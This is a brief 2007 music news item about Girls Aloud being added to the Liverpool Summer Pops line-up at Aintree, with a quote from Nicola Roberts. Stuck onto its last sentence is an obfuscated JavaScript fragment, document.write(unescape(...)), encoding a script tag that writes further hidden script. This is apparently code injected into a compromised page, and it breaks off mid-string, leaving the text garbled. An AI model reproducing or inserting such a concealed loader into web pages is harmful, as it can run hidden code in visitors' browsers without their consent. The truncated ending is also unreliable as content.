Girls Aloud have become the latest addition to the bill of 2007's Liverpool Summer Pops.
The girl band will play at a 4,000 capacity big top on July 3rd.
The month-long event, which takes place at the Aintree Racecourse, has already confirmed appearances from a variety of acts, including Amy Winehouse, James Morrison, Deacon Blue, Mcfly, OMD and Steely Dan.
Speaking about the appearance, Liverpudlian band member Nicola Roberts said: "This is going to feel like a home town show for me.
"I know all about the Pops, being a local girl, and it should be a really great night for us!!"
Tickets for the show went on sale today at 9.00am.
Girls Aloud are expected to make number one this weekend with their charity Sugababes cover version collaboration "Walk This Way".document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
